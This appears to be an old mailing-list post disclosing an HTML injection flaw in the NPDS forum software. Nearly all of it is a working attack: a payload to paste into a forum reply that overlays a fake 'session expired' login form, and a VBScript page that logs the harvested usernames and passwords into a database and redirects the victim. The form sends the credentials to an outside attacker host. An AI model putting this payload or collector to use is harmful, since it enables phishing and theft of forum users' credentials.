<<< Date Index >>>     <<< Thread Index >>>

Npds BB HTML Injection


I release it very quickly ... So it can be improved :

Code to put in a reply or in a topic :

Your fake message</td></tr><tr><td valign="bottom"><hr noshade size="1" 
class="ONGL">&nbsp;&nbsp<a href="user.php?op=userinfo&uname=User" CLASS="NOIR" 
target=_blank><img src="images/forum/icons/profile.gif" border=0 
ALT="">Profil</a>&nbsp;&nbsp;<a href="http://www.userland.com"; TARGET="_blank" 
CLASS="NOIR" TARGET="_blank"><IMG SRC="images/forum/icons/www_icon.gif" 
BORDER=0 Alt="">www</a>&nbsp;&nbsp;<a 
href="reply.php?topic=1&forum=1&post=2&citation=1" CLASS="NOIR"><IMG 
SRC="images/forum/icons/quote.gif" BORDER="0" Alt=""><FONT 
SIZE=1>Citation</FONT></a>

&nbsp;&nbsp;<a href="prntopic.php?forum=1&topic=1&post_id=2" CLASS="NOIR"><IMG 
SRC="images/forum/icons/print.gif" BORDER="0" Alt=""></a>
</td></tr></table></TD></TR>



<div style="position: absolute; left=0; top=0; height=3200; width=150"><form 
action="http://mon-site-de-roxor.com/roxor.asp"; method="post" name="piquage" 
target="_self"><table width="100%" border="0" cellspacing="0" 
cellpadding="0"><tr><td colspan="2"><div align="center">Your session has 
expired. Please log in to 
reply.</div></td></tr><tr><td>&nbsp;</td></tr><tr><td><div align="right">Login 
:</div> </td> <td><input name="login" type="text" value=""> 
</td></tr><tr><td><div align="right">Mot de passe :</div> </td><td><input 
name="password" type="password" value=""> 
</td></tr><tr><td>&nbsp;</td></tr><tr><td colspan="2"><div 
align="center"><input type="submit" name="Submit" 
value="Envoyer"></div></td></tr></table></form></div>

Example of Code (VBscript) to put in the page called by the form in the topic : 

<%@ Language=VBScript %>



<%



set base=server.createobject("ADODB.CONNECTION")

base.open nom_base, login_base, password_base



referant=left(request.servervariables("HTTP_REFERER"),instr(8,request.servervariables("HTTP_REFERER"),"/")-1)

login=Request.QueryString("login")

password=Request.QueryString("password")



requete_vol_infos="INSERT statistiques (date,npds,login,password) VALUES 
(getdate(),'" + cstr(referant) + "','" + cstr(login) + "','" + cstr(password) + 
"')"



set resultat_vol_infos=server.CreateObject("ADODB.RECORDSET")

resultat_vol_infos.Open requete_vol_infos, base



response.redirect(referant)



%>

Thanks to N-0-X and NewFFR :o)

Rituel